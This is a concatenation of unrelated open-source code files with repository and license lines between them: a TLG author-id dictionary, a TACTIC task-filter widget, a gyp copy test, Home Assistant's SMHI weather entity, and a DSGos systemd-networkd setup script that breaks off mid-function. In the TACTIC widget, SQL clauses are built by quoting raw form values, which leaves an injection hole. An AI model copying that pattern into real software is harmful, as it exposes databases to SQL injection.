"5052": "Scholia in Maximum Confessorem",
"2950": "Adamantius Theol.",
"2385": "Polycritus Hist.",
"1379": "Fragmenta Alchemica",
"2130": "Arethas Philol. et Scr. Eccl.",
"2634": "Pamphilus Poeta",
"1534": "Nicocles Hist.",
"0641": "Xenophon Scr. Erot.",
"0651": "Antoninus Liberalis Myth.",
"1452": "Juba II Rex Mauretaniae [Hist.]",
"1312": "Didymus Gramm.",
"2084": "Basilius Med. et Scr. Eccl.",
"1642": "Pseudo-Ptolemaeus",
"0363": "Claudius Ptolemaeus Math.",
"1550": "Oracula Chaldaica",
"0676": "Aglaรฏs Poet. Med.",
"1240": "Callixenus Hist.",
"1559": "Bucolicum",
"2536": "Andron Geogr.",
"2287": "Fragmentum Stoicum",
"2122": "Gaius Asinius Quadratus Hist.",
"2573": "Pausanias Hist.",
"0222": "Eratosthenes et Eratosthenica Philol.",
"4084": "Zosimus Hist.",
"0577": "Nicolaus Hist.",
"4235": "Joannes Rhet.",
"1244": "Carneiscus Phil.",
"0686": "Aethlius Hist.",
"4100": "Aphthonius Rhet.",
"0391": "Acta Scillitanorum Martyrum",
"2140": "Iamblichus Alchem.",
"0569": "Apollonius Paradox.",
"2512": "Paeon Hist.",
"2649": "Amyntas Epigr.",
"1499": "Menecles Hist.",
"4033": "Anonymi In Aristotelis Ethica Nicomachea Phil.",
"1139": "Anonymi Historici (FGrH)",
"0576": "Musaeus Epic.",
"0434": "Cratinus Comic.",
"2632": "Comarius Alchem.",
"2721": "Theodorus Prodromus Poeta et Polyhist.",
"1197": "Artemon Gramm.",
"0259": "Scythinus Poet. Phil.",
"0072": "Anonymi Grammatici Gramm.",
"0658": "Heliodorus Scr. Erot.",
"0024": "Oppianus Epic.",
"0033": "Pindarus Lyr.",
"0323": "Antiphon Trag.",
"1425": "Hermonax Epic.",
"0519": "Xeno Comic.",
"4318": "Vita Sophoclis",
"0330": "Dionysius I [Trag.]",
"1828": "Pamphila Hist.",
"0486": "Pherecrates Comic.",
"1547": "Oedipodea",
"1347": "Epimenides Phil.",
"0731": "Adamantius Judaeus Med.",
"4101": "Etymologicum Parvum",
"4124": "Eusebius Scr. Eccl.",
"0227": "Anonymi Curetum Hymnus",
"1748": "Sosigenes Phil.",
"2652": "Diodorus Eleg.",
"1747": "Vita Adam Et Evae",
"0432": "Clearchus Comic.",
"0845": "Ctesias Hist. et Med.",
"1703": "Teucer Astrol.",
"4086": "[Agathodaemon] Alchem.",
"4031": "Eustratius Phil.",
"2102": "Didymus Caecus Scr. Eccl., Didymus the Blind",
"0464": "Hegesippus Comic.",
"0271": "Conventus Avium",
"1342": "Empedocles Poet. Phil.",
"2866": "Oecumenius Phil. et Rhet.",
"1526": "Neoptolemus Gramm.",
"0428": "Cantharus Comic.",
"0365": "Apollodorus Lyr.",
"1339": "Duris Hist.",
"1917": "Demetrius Hist.",
"0247": "Dionysius II [Eleg.]",
"2624": "Hermias Poeta",
"1218": "Basilis Hist.",
"1021": "Meropis",
"0459": "Eunicus Comic.",
"0329": "Theodectas Trag.",
"1471": "Lyrica Adespota (SLG)",
"0032": "Xenophon Hist.",
"2037": "Joannes Stobaeus Anthologus",
"4115": "Theophilus Scr. Eccl.",
"2622": "Dorieus Poeta",
"1152": "Apion Gramm.",
"0004": "Diogenes Laertius Biogr.",
"5033": "Scholia In Pausaniam",
"2806": "Marcus Diaconus Scr. Eccl.",
"1645": "Ptolemaeus VIII Euergetes II [Hist.]",
"0094": "Pseudo-Plutarchus",
"1183": "Aristeae Epistula",
"2699": "Amphicrates Rhet.",
"0281": "Marcellus Poet. Med.",
"4175": "Commentaria In Dionysii Thracis Artem Grammaticam",
"9023": "Thomas Magister Philol.",
"1560": "Matthiae Traditiones",
"5046": "Scholia In Theonem Rhetorem",
"2444": "Lycophron Soph.",
"3140": "Joel Chronogr.",
"0697": "Cornelius Alexander Polyhist.",
"3088": "Nicephorus Bryennius Hist.",
"1487": "Maximus Astrol.",
"0228": "Anonymi Hymnus In Dactylos Idaeos",
"1793": "Timoxenus Comic.",
"2038": "Acta Thomae",
"1131": "Anonymus Ad Avircium Marcellum Contra Cataphrygas",
"0671": "Philumenus Med.",
"0563": "Maximus Soph.",
"5023": "Scholia In Euripidem",
"2319": "Apollodorus Phil.",
"0667": "Marcellinus I Med.",
"5002": "Magica",
"0683": "Aethiopis",
"0099": "Strabo Geogr.",
"0654": "Lucius Annaeus Cornutus Phil.",
"0231": "Elegiaca Adespota (CA)",
"1699": "Teles Phil.",
"1683": "Sophaenetus Hist.",
"2210": "Anaxicrates Hist.",
"0725": "Anaximander Phil.",
"0214": "Phanocles Eleg.",
"0568": "Antigonus Paradox.",
"4134": "Diodorus Scr. Eccl.",
"0897": "Euthydemus Med.",
"0639": "Menecrates Med.",
"0309": "Achaeus Trag.",
"1615": "Platonius Gramm.",
"1258": "Charon Hist.",
"2112": "Amphilochius Scr. Eccl.",
"1375": "Evangelium Thomae",
"0476": "Mnesimachus Comic.",
"0888": "Eudemus Poet. Med.",
"4331": "Hierotheus Alchem.",
"1251": "Chamaeleon Phil.",
"4307": "Lexica Synonymica",
"0595": "Zeno Phil.",
"2399": "Eudromus Phil.",
"1307": "Demon Hist.",
"1496": "Memnon Hist.",
"0258": "Pigres Eleg.",
"1446": "Ion Eleg.",
"1666": "Sententiae Sexti",
"1585": "Pherecydis Epistula",
"0570": "Archelaus Paradox.",
"1223": "Bias [Phil.]",
"4061": "Cosmas Indicopleustes Geogr.",
"4288": "Lexicon ฮฑแผฑฮผฯฮดฮตแฟฮฝ",
"0662": "Comica Adespota (CGFPR)",
"1357": "Eudemus Phil.",
"2966": "Phileas Scr. Eccl.",
"2231": "Thrasyalces Phil.",
"2190": "[Clitonymus] Hist.",
"0018": "Philo Judaeus Phil.",
"1118": "Pseudo-Dioscorides Med.",
"1848": "Meletus Junior Trag.",
"DOCCAN1": "TLG Canon, bibliography",
"1605": "Pseudo-Phocylides Gnom.",
"0475": "Metagenes Comic.",
"0479": "Nico Comic.",
"1915": "Eudoxus Hist.",
"0060": "Diodorus Siculus Hist.",
"0537": "Epicurus Phil.",
"1184": "Aristides Apol.",
"2185": "Dionysius ฮฮตฯฮฑฮธฮญฮผฮตฮฝฮฟฯ Phil.",
"2354": "Dionysius Hist.",
"0620": "Archytas Phil.",
"5018": "Scholia In Dionysium Byzantium",
"2202": "[Menyllus] Hist.",
"0186": "Marcus Cornelius Fronto Rhet.",
"1548": "Oenomaus Phil.",
"1245": "Carystius Hist.",
"4126": "Theodorus Scr. Eccl.",
"0427": "[Callippus] Comic.",
"2398": "Basilides Phil.",
"0440": "Demetrius Junior Comic.",
"0495": "Phoenicides Comic.",
"0816": "Theudo[tus] Trag.",
"2141": "Publius Herennius Dexippus Hist.",
"2602": "Timaeus Sophista Gramm.",
"1711": "[Thearidas] Phil.",
"0738": "Hippiatrica",
"0468": "Hipparchus Comic.",
"0722": "Oribasius Med.",
"0580": "Paradoxographus Florentinus",
"3069": "Leo Diaconus Hist.",
"0652": "Philostratus Junior Soph.",
"3051": "Georgius Monachus Continuatus",
"2877": "Cyrillus Biogr.",
"2232": "Damon Mus.",
"3014": "Joannes Camaterus Astrol. et Astron.",
"0737": "Julianus Scriptor Legis De Medicis",
"1525": "Neanthes Hist.",
"2606": "Agathyllus Eleg.",
"2525": "Laetus Hist.",
"2172": "Andron Hist.",
"0306": "Aristarchus Trag.",
"0382": "Castorion Lyr.",
"1987": "Theodorus Poeta",
"0728": "Theophilus Protospatharius, Damascius et Stephanus Atheniensis Med.",
"0431": "Chionides Comic.",
"1409": "Heraclides Ponticus Phil.",
"0527": "Septuaginta",
"1128": "Anonymi Commentarius In Platonis Theaetetum",
"0355": "Zopyrus Trag.",
"0047": "Pausaniae I Et Xerxis Epistulae",
"1421": "Hermippus Gramm. et Hist.",
"1420": "Hermias Iamb.",
"4102": "Catenae (Novum Testamentum)",
"0267": "Xenophanes Poet. Phil.",
"2304": "Idaeus Phil.",
"0010": "Isocrates Orat.",
"0131": "Archimelus Epigr.",
"1173": "Archedemus Phil.",
"0358": "Nicomachus Math.",
"0055": "Themistoclis Epistulae",
"1178": "[Aresas] Phil.",
"1087": "Cleophon Trag.",
"1504": "Menelaus Epic.",
"2265": "Diodorus Perieg.",
"1470": "Lycus Hist.",
"1461": "Leucippus Phil.",
"0715": "Paulus Med.",
"4293": "Fragmentum Lexici Graeci",
"1176": "Archytas Epic.",
"2326": "Dei(l)ochus Hist.",
"0425": "Bato Comic.",
"0407": "Anaxippus Comic.",
"1819": "Pseudo-Demosthenes Epigr.",
"1200": "Asclepiades Myth.",
"0165": "Diodorus Rhet.",
"1443": "Ignatius Scr. Eccl.",
"1419": "Hermas Scr. Eccl., Pastor Hermae",
"2268": "Timagoras Hist.",
"2119": "Christodorus Epic.",
"0411": "Apollodorus Comic.",
"1252": "Certamen Homeri Et Hesiodi",
"2904": "Nicolaus Rhet. et Soph.",
"0278": "Praelusio Mimi",
"0359": "Isidorus Scriptor Hymnorum",
"4187": "Leo Magentinus Phil.",
"1388": "Harmodius Hist.",
"0262": "Socrates Phil.",
"0487": "Philemon Comic.",
"2552": "Critolaus Hist.",
"3159": "Barlaam Math., Theol. et Epist.",
"2060": "Asterius Scr. Eccl.",
"2449": "Timotheus Gramm.",
"0491": "Philiscus Comic.",
"4046": "Theophanes Confessor Chronogr.",
"2639": "Posidonius Epic.",
"0216": "Alexander Lyr. et Trag.",
"0607": "Aelius Theon Rhet.",
"1272": "Cleomedes Astron.",
"0357": "Didymus Scriptor De Mensuris",
"1266": "Tyrannion Gramm.",
"1696": "Straton Phil.",
"0454": "Epinicus Comic.",
"1158": "Apocalypsis Joannis",
"0011": "Sophocles Trag.",
"3040": "Josephus Genesius Hist.",
"4153": "Theophanes Continuatus",
"2200": "Libanius Rhet. et Soph.",
"2306": "Xenomedes Hist.",
"2193": "[Aretades] Hist.",
"1906": "Simonides Epic.",
"0452": "Epigenes Comic.",
"0625": "Polemaeus Trag.",
"1166": "Apollodorus Phil.",
"1442": "Idomeneus Hist.",
"4080": "Geoponica",
"2298": "Lysanias Hist.",
"1306": "Bolus Med. et Phil.",
"2393": "Andreas Hist.",
"0081": "Dionysius Halicarnassensis Hist. et Rhet.",
"0389": "Acta Petri",
"0354": "Zenodotus Trag.",
"1462": "Liber Eldad Et Modad",
"3144": "Joannes Cananus Hist.",
"1562": "Parmenides Poet. Phil.",
"4289": "Lexica Segueriana",
"9007": "Appendix Proverbiorum",
"1313": "Dieuchidas Hist.",
"1588": "Philicus Lyr.",
"1651": "Pythermus Hist.",
"1170": "Apollonius Hist.",
"1199": "Asclepiades Gramm. et Hist.",
"1784": "[Heraclitus] Comic.",
"0215": "Antagoras Epic.",
"2627": "Damianus Scriptor De Opticis",
"2418": "Archinus Hist.",
"0002": "Theognis Eleg.",
"0366": "Lasus Lyr.",
"0242": "Asius Eleg. et Epic.",
"1262": "Choerilus Epic.",
"3182": "Pseudo-Symeon Hist.",
"0035": "Moschus Bucol.",
"1641": "Ptolemaeus Gnost.",
"1765": "Vitae Aesopi",
"2168": "Apollophanes Phil.",
"2203": "[Theophilus] Hist.",
"0629": "Periander [Phil.]",
"1052": "Posidonius Phil.",
"0560": "[Longinus] Rhet., Pseudo-Longinus",
"4020": "Elias Phil.",
"4030": "Sophonias Phil.",
"1650": "Pytheas Perieg.",
"1264": "Chrysippus Phil.",
"0565": "Soranus Med.",
"2426": "Hermaeus Hist.",
"1205": "Athenagoras Apol.",
"2014": "Acta Phileae",
"2054": "Aristides Quintilianus Mus.",
"1249": "Cephalion Hist. et Rhet.",
"0296": "Carmina Convivialia (PMG)",
"1661": "Satyrus Hist.",
"2245": "Simus Phil.",
"1759": "Sententiae Pythagoreorum",
"1706": "Thallus Hist.",
"2286": "Cercops Phil.",
"4227": "Anonymus De Philosophia Platonica Phil.",
"5025": "Scholia In Hesiodum",
"1553": "[Palaephatus] Myth.",
"4013": "Simplicius Phil.",
"3064": "Scylitzes Continuatus",
"0381": "Lycophronides Lyr.",
"0415": "Araros Comic.",
"0403": "Amipsias Comic.",
"0539": "Hellanicus Hist.",
"2018": "Eusebius Scr. Eccl. et Theol.",
"0293": "Ibycus Lyr.",
"0501": "Sannyrion Comic.",
"1392": "Hegesander Hist.",
"2460": "Glaucus Hist.",
"2017": "Gregorius Nyssenus Theol.",
"4305": "Claudius Casilon Gramm.",
"1623": "Polycharmus Hist.",
"0015": "Herodianus Hist.",
"2694": "Sostratus Poeta",
"0116": "Abydenus Hist.",
"2417": "Cineas Rhet.",
"1433": "Hipparchus [Epigr.]",
"0379": "Philoxenus Lyr.",
"2212": "Lyceas Hist.",
"0310": "Carcinus Trag.",
"2934": "Joannes Damascenus Scr. Eccl. et Theol., John of Damascus",
"0202": "Mace(donius) Lyr.",
"1226": "Biton Mech.",
"4001": "Aeneas Phil. et Rhet.",
"1751": "Xanthus Hist.",
"0745": "Hierophilus Phil. et Soph.",
"1678": "Socrates Hist.",
"1719": "Theodosius Astron. et Math.",
"0328": "Chaeremon Trag.",
"2392": "Artemon Hist.",
"0419": "Aristomenes Comic.",
"2003": "Flavius Claudius Julianus Imperator Phil., Julian the Apostate",
"2339": "Maeandrius Hist.",
"0276": "Cantus Lugubris",
"1992": "Ariston Apol.",
"1695": "[Sthenidas] Phil.",
"1405": "Heraclides Criticus Perieg.",
"2064": "Acacius Theol.",
"0400": "Alcaeus Comic.",
"0608": "Satyrus Biogr.",
"1355": "Erinna Lyr.",
"0280": "Andromachus Poet. Med.",
"2050": "Eunapius Hist. et Soph.",
"1400": "Heliodorus Perieg.",
"2195": "[Chrysermus] Hist.",
"1250": "Cercidas Iamb.",
"1749": "Vitae Hesiodi Particula",
"9003": "Anonymus Lexicographus Lexicogr.",
"3187": "Georgius Gramm.",
"2341": "Aristocritus Hist.",
"0318": "Agathon Trag.",
"1654": "Rhinthon Comic.",
"1570": "Epitaphium Pectorii",
"2046": "Quintus Epic.",
"7000": "Anthologia Graeca, AG",
"1558": "Papias Scr. Eccl.",
"1469": "Lyceas Hist.",
"2244": "Damon et Phintias Phil.",
"1714": "Theocritus Soph.",
"0626": "Heraclitus Phil.",
"1444": "Ilias Parva",
"4328": "Philosophus Christianus Alchem.",
"0627": "Hippocrates Med. et Corpus Hippocraticum",
"4167": "Leontius Mech.",
"2600": "Simon Scriptor De Re Equestri",
"1268": "Claudius Iolaus Hist.",
"4083": "Eustathius Philol. et Scr. Eccl.",
"1150": "Aphareus Rhet.",
"3186": "Anonymus Dialogus Cum Judaeis",
"1908": "Daimachus Hist.",
"0064": "Periplus Hannonis",
"4319": "Zosimus Alchem.",
"0413": "Apollodorus Comic.",
"1341": "[Ecphantus] Phil.",
"1781": "Philippus Comic.",
"0742": "Hymni Anonymi",
"0587": "Sotion [Paradox.]",
"1858": "Oratio Manassis",
"1429": "Hierocles Phil.",
"9010": "Suda, Suidas",
"1145": "Antiochus Hist.",
"1542": "Numenius Phil.",
"3115": "Symeon Metaphrastes Biogr. et Hist.",
"4294": "Lexicon Vindobonense",
"0546": "Aelianus Tact.",
"3018": "Georgius Cedrenus Chronogr.",
"2596": "Phoebammon Soph.",
"0584": "Philostephanus Hist.",
"1613": "Pittaci Epistula",
"1617": "Marcus Antonius Polemon Soph.",
"1576": "Phaedimus [Epic.]",
"1291": "Creophylus Hist.",
"0084": "Dionysius Perieg.",
"0305": "Aristias Trag.",
"2248": "Acta Xanthippae Et Polyxenae",
"0659": "Comica Adespota (Suppl. Com.)",
}
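# Editor's note (illustrative, not part of the original file): the mapping above ties
# TLG Canon author/work numbers to their conventional names, so a lookup is a plain
# dict access. The binding name `tlg_authors` is an assumption; the module may bind
# the dict to a different name.
#
#   tlg_authors.get("0012")          # -> "Homerus Epic., Homer"
#   tlg_authors.get("9999", "n/a")   # unknown ids fall back to a default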
|
mit
|
hsuchie4/TACTIC
|
src/pyasm/prod/web/artist_view_wdg.py
|
6
|
5064
|
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__=['ArtistViewWdg']
from pyasm.common import Environment
from pyasm.search import Search
from pyasm.biz import StatusEnum, Pipeline, Project
from pyasm.web import Widget, WebContainer, SpanWdg
from pyasm.widget import CheckboxWdg
class ArtistViewWdg(SpanWdg):
    def init(my):
        my.add("Show assigned only: ")
        my.checkbox = CheckboxWdg("show_assigned_only")
        my.checkbox.set_option("value", "on")
        my.checkbox.set_persistence()
        my.checkbox.add_event("onclick", "document.form.submit()")
        my.add(my.checkbox)
        my.add_class("med")

    def is_supervisor(my):
        # if the user is a supervisor, look at all of the assets
        project = Project.get_project_name()
        security = Environment.get_security()
        return security.check_access("prod/%s" % project, "model/supervisor", "true")

    def is_artist(my):
        # if the user is an artist, look at all of the assets
        project = Project.get_project_name()
        security = Environment.get_security()
        return security.check_access("prod/%s" % project, "model/artist", "true")

    def alter_search(my, search):
        # get all of the tasks relevant to the user
        task_search = Search("sthpw/task")
        task_search.add_column("search_id")

        # only look at this project
        project = Project.get_project_name()
        task_search.add_filter("search_type", search.get_search_type())

        # figure out who the user is
        security = Environment.get_security()
        login = security.get_login()
        user = login.get_value("login")

        print "is_artist: ", my.is_artist()
        print "is_supervisor: ", my.is_supervisor()

        # do some filtering
        web = WebContainer.get_web()
        show_assigned_only = my.checkbox.get_value()
        show_process = web.get_form_values("process")
        if not show_process or show_process[0] == '':
            show_process = []
        show_task_status = web.get_form_values("task_status")
        if not show_task_status or show_task_status[0] == '':
            show_task_status = []

        if show_assigned_only == "on":
            task_search.add_filter("assigned", user)
        if show_process:
            where = "process in (%s)" % ", ".join( ["'%s'" % x for x in show_process] )
            task_search.add_where(where)
        if show_task_status:
            where = "status in (%s)" % ", ".join( ["'%s'" % x for x in show_task_status] )
            task_search.add_where(where)
        else:
            task_search.add_where("NULL")

        # record the tasks
        my.tasks = task_search.get_sobjects()

        # get all of the sobject ids
        sobject_ids = ["'%s'" % x.get_value("search_id") for x in my.tasks]

        # get all of the sobjects related to this task
        if sobject_ids:
            search.add_where( "id in (%s)" % ", ".join(sobject_ids) )


class SupervisorViewWdg(Widget):
    def init(my):
        my.add("Process: ")
        checkbox = CheckboxWdg("process")
        checkbox.set_option("value", "on")
        checkbox.set_persistence()
        checkbox.add_event("onclick", "document.form.submit()")
        my.add(checkbox)

    def filter_sobjects(my, orig_sobjects):
        # look for groups that are relevant
        groups = Environment.get_security().get_groups()
        login = Environment.get_security().get_login()

        # either we are user centric or process centric
        user = login.get_value("login")

        sobjects = []

        # filter out sobjects that do not have appropriate tasks
        if orig_sobjects:
            search_type = orig_sobjects[0].get_search_type()
            ids = [str(x.get_id()) for x in orig_sobjects]
            search = Search("sthpw/task")
            search.add_filter("search_type", search_type)
            search.add_where("search_id in (%s)" % ",".join(ids) )

            # get only tasks assigned to a user
            show_assigned_only = True
            if show_assigned_only:
                search.add_filter("assigned", user)
            search.add_where("status in ('Pending','In Progress')")
            search.add_where("status is NULL")
            tasks = search.get_sobjects()
            task_search_ids = [int(x.get_value("search_id")) for x in tasks]

            # once we have all of the tasks for this episode, we filter
            # out any assets that don't have these tasks
            for orig_sobject in orig_sobjects:
                search_id = orig_sobject.get_id()
                if search_id in task_search_ids:
                    sobjects.append(orig_sobject)

        return sobjects
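
# Editor's sketch (illustrative, not part of the original file): how
# ArtistViewWdg.alter_search is typically exercised. The "prod/asset" search type
# and the surrounding calls are assumptions for illustration only.
#
#   artist_view = ArtistViewWdg()
#   search = Search("prod/asset")      # hypothetical production search type
#   artist_view.alter_search(search)   # narrows the search to assets with matching tasks
#   assets = search.get_sobjects()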
|
epl-1.0
|
eXcomm/cjdns
|
node_build/dependencies/libuv/build/gyp/test/copies/gyptest-default.py
|
264
|
1268
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies file copies using the build tool default.
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('copies.gyp', chdir='src')
test.relocate('src', 'relocate/src')
test.build('copies.gyp', chdir='relocate/src')
test.must_match(['relocate', 'src', 'copies-out', 'file1'], 'file1 contents\n')
test.built_file_must_match('copies-out/file2',
                           'file2 contents\n',
                           chdir='relocate/src')
test.built_file_must_match('copies-out/directory/file3',
                           'file3 contents\n',
                           chdir='relocate/src')
test.built_file_must_match('copies-out/directory/file4',
                           'file4 contents\n',
                           chdir='relocate/src')
test.built_file_must_match('copies-out/directory/subdir/file5',
                           'file5 contents\n',
                           chdir='relocate/src')
test.built_file_must_match('copies-out/subdir/file6',
                           'file6 contents\n',
                           chdir='relocate/src')
test.pass_test()
|
gpl-3.0
|
mezz64/home-assistant
|
homeassistant/components/smhi/weather.py
|
12
|
6669
|
"""Support for the Swedish weather institute weather service."""
import asyncio
from datetime import timedelta
import logging
from typing import Dict, List
import aiohttp
import async_timeout
from smhi import Smhi
from smhi.smhi_lib import SmhiForecastException
from homeassistant.components.weather import (
    ATTR_FORECAST_CONDITION,
    ATTR_FORECAST_PRECIPITATION,
    ATTR_FORECAST_TEMP,
    ATTR_FORECAST_TEMP_LOW,
    ATTR_FORECAST_TIME,
    WeatherEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME, TEMP_CELSIUS
from homeassistant.core import HomeAssistant
from homeassistant.helpers import aiohttp_client
from homeassistant.util import Throttle, slugify
from .const import ATTR_SMHI_CLOUDINESS, ENTITY_ID_SENSOR_FORMAT
_LOGGER = logging.getLogger(__name__)
# Used to map condition from API results
CONDITION_CLASSES = {
    "cloudy": [5, 6],
    "fog": [7],
    "hail": [],
    "lightning": [21],
    "lightning-rainy": [11],
    "partlycloudy": [3, 4],
    "pouring": [10, 20],
    "rainy": [8, 9, 18, 19],
    "snowy": [15, 16, 17, 25, 26, 27],
    "snowy-rainy": [12, 13, 14, 22, 23, 24],
    "sunny": [1, 2],
    "windy": [],
    "windy-variant": [],
    "exceptional": [],
}
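# Editor's note (illustrative, not part of the upstream module): the mapping above goes
# from a Home Assistant condition string to the SMHI symbol codes it covers, so the
# properties below reverse it with next(). A minimal standalone sketch of that lookup,
# assuming symbol code 9 (listed under "rainy" above):
#
#   symbol = 9
#   condition = next(
#       (cond for cond, codes in CONDITION_CLASSES.items() if symbol in codes), None
#   )
#   assert condition == "rainy"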
# 5 minutes between retrying connect to API again
RETRY_TIMEOUT = 5 * 60
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=31)
async def async_setup_entry(
    hass: HomeAssistant, config_entry: ConfigEntry, config_entries
) -> bool:
    """Add a weather entity from map location."""
    location = config_entry.data
    name = slugify(location[CONF_NAME])
    session = aiohttp_client.async_get_clientsession(hass)

    entity = SmhiWeather(
        location[CONF_NAME],
        location[CONF_LATITUDE],
        location[CONF_LONGITUDE],
        session=session,
    )
    entity.entity_id = ENTITY_ID_SENSOR_FORMAT.format(name)

    config_entries([entity], True)
    return True


class SmhiWeather(WeatherEntity):
    """Representation of a weather entity."""

    def __init__(
        self,
        name: str,
        latitude: str,
        longitude: str,
        session: aiohttp.ClientSession = None,
    ) -> None:
        """Initialize the SMHI weather entity."""
        self._name = name
        self._latitude = latitude
        self._longitude = longitude
        self._forecasts = None
        self._fail_count = 0
        self._smhi_api = Smhi(self._longitude, self._latitude, session=session)

    @property
    def unique_id(self) -> str:
        """Return a unique id."""
        return f"{self._latitude}, {self._longitude}"

    @Throttle(MIN_TIME_BETWEEN_UPDATES)
    async def async_update(self) -> None:
        """Refresh the forecast data from SMHI weather API."""
        try:
            with async_timeout.timeout(10):
                self._forecasts = await self.get_weather_forecast()
                self._fail_count = 0
        except (asyncio.TimeoutError, SmhiForecastException):
            _LOGGER.error("Failed to connect to SMHI API, retry in 5 minutes")
            self._fail_count += 1
            if self._fail_count < 3:
                self.hass.helpers.event.async_call_later(
                    RETRY_TIMEOUT, self.retry_update
                )

    async def retry_update(self, _):
        """Retry refresh weather forecast."""
        await self.async_update()

    async def get_weather_forecast(self) -> []:
        """Return the current forecasts from SMHI API."""
        return await self._smhi_api.async_get_forecast()

    @property
    def name(self) -> str:
        """Return the name of the sensor."""
        return self._name

    @property
    def temperature(self) -> int:
        """Return the temperature."""
        if self._forecasts is not None:
            return self._forecasts[0].temperature
        return None

    @property
    def temperature_unit(self) -> str:
        """Return the unit of measurement."""
        return TEMP_CELSIUS

    @property
    def humidity(self) -> int:
        """Return the humidity."""
        if self._forecasts is not None:
            return self._forecasts[0].humidity
        return None

    @property
    def wind_speed(self) -> float:
        """Return the wind speed."""
        if self._forecasts is not None:
            # Convert from m/s to km/h
            return round(self._forecasts[0].wind_speed * 18 / 5)
        return None
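    # Editor's note (illustrative): the m/s to km/h conversion above uses the exact
    # factor 18/5 (= 3.6); e.g. a forecast wind_speed of 10 m/s is reported as
    # round(10 * 18 / 5) == 36 km/h.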
    @property
    def wind_bearing(self) -> int:
        """Return the wind bearing."""
        if self._forecasts is not None:
            return self._forecasts[0].wind_direction
        return None

    @property
    def visibility(self) -> float:
        """Return the visibility."""
        if self._forecasts is not None:
            return self._forecasts[0].horizontal_visibility
        return None

    @property
    def pressure(self) -> int:
        """Return the pressure."""
        if self._forecasts is not None:
            return self._forecasts[0].pressure
        return None

    @property
    def cloudiness(self) -> int:
        """Return the cloudiness."""
        if self._forecasts is not None:
            return self._forecasts[0].cloudiness
        return None

    @property
    def condition(self) -> str:
        """Return the weather condition."""
        if self._forecasts is None:
            return None
        return next(
            (k for k, v in CONDITION_CLASSES.items() if self._forecasts[0].symbol in v),
            None,
        )

    @property
    def attribution(self) -> str:
        """Return the attribution."""
        return "Swedish weather institute (SMHI)"

    @property
    def forecast(self) -> List:
        """Return the forecast."""
        if self._forecasts is None or len(self._forecasts) < 2:
            return None
        data = []
        for forecast in self._forecasts[1:]:
            condition = next(
                (k for k, v in CONDITION_CLASSES.items() if forecast.symbol in v), None
            )
            data.append(
                {
                    ATTR_FORECAST_TIME: forecast.valid_time.isoformat(),
                    ATTR_FORECAST_TEMP: forecast.temperature_max,
                    ATTR_FORECAST_TEMP_LOW: forecast.temperature_min,
                    ATTR_FORECAST_PRECIPITATION: round(forecast.total_precipitation, 1),
                    ATTR_FORECAST_CONDITION: condition,
                }
            )
        return data

    @property
    def device_state_attributes(self) -> Dict:
        """Return SMHI specific attributes."""
        if self.cloudiness:
            return {ATTR_SMHI_CLOUDINESS: self.cloudiness}
|
apache-2.0
|
DecisionSystemsGroup/DSGos
|
airootfs/usr/share/DSGos-Installer/DSGos_Installer/installation/systemd_networkd.py
|
2
|
4641
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# systemd_networkd.py
#
# Copyright © 2013-2015 DSGos
#
# This file is part of DSGos_Installer.
#
# DSGos_Installer is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# DSGos_Installer is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# The following additional terms are in effect as per Section 7 of the license:
#
# The preservation of all legal notices and author attributions in
# the material or in the Appropriate Legal Notices displayed
# by works containing it is required.
#
# You should have received a copy of the GNU General Public License
# along with DSGos_Installer; If not, see <http://www.gnu.org/licenses/>.
""" systemd-networkd configuration in base install. """
# https://wiki.archlinux.org/index.php/Systemd-networkd
# TODO: Setup wireless interfaces
# https://wiki.archlinux.org/index.php/WPA_supplicant
import os
import subprocess
import logging
from installation import chroot
DEST_DIR = "/install"
def chroot_run(cmd):
    chroot.run(cmd, DEST_DIR)


def setup(ssid=None, passphrase=None):
    """ Configure system-networkd for base installs """

    # For compatibility with resolv.conf, delete the existing file and
    # create the following symbolic link:
    source = os.path.join("/run/systemd/resolve/resolv.conf")
    link_name = os.path.join(DEST_DIR, "etc/resolv.conf")

    # Delete /etc/resolv.conf if it already exists
    if os.path.exists(link_name):
        os.unlink(link_name)

    # Create the symlink
    try:
        os.symlink(source, link_name)
    except OSError as os_error:
        logging.warning(os_error)

    # Get interface names (links)
    links = []
    links_wireless = []
    try:
        cmd = ['networkctl', 'list']
        output = subprocess.check_output(cmd).decode().split('\n')
        for line in output:
            fields = line.split()
            if len(fields) > 0:
                link = fields[1]
                if link.startswith("eth") or link.startswith("enp"):
                    links.append(link)
                elif link.startswith("wlp"):
                    links.append(link)
                    links_wireless.append(link)
    except subprocess.CalledProcessError as process_error:
        logging.warning("systemd-networkd configuration failed: %s", process_error)
        return

    logging.debug("Found [%s] links and [%s] are wireless", " ".join(links), " ".join(links_wireless))

    # Setup DHCP by default for all interfaces found
    for link in links:
        fname = "etc/systemd/network/{0}.network".format(link)
        wired_path = os.path.join(DEST_DIR, fname)
        with open(wired_path, 'w') as wired_file:
            wired_file.write("# {0} adapter using DHCP (written by DSGos_Installer)\n".format(link))
            wired_file.write("[Match]\n")
            wired_file.write("Name={0}\n\n".format(link))
            wired_file.write("[Network]\n")
            wired_file.write("DHCP=ipv4\n")
        logging.debug("Created %s configuration file", wired_path)

    # A wireless adapter must be configured with another service such as
    # wpa_supplicant, and the corresponding service must be enabled:
    # /etc/wpa_supplicant/wpa_supplicant-interface.conf.
    # systemctl enable wpa_supplicant@interface

    # Setup wpa_supplicant. We need the SSID and the passphrase
    # TODO: Ask for different ssids or passphrases for each interface
    if ssid is not None and passphrase is not None:
        for link in links_wireless:
            conf_path = os.path.join(
                DEST_DIR,
                "etc/wpa_supplicant/wpa_supplicant-{0}.conf".format(link))
            try:
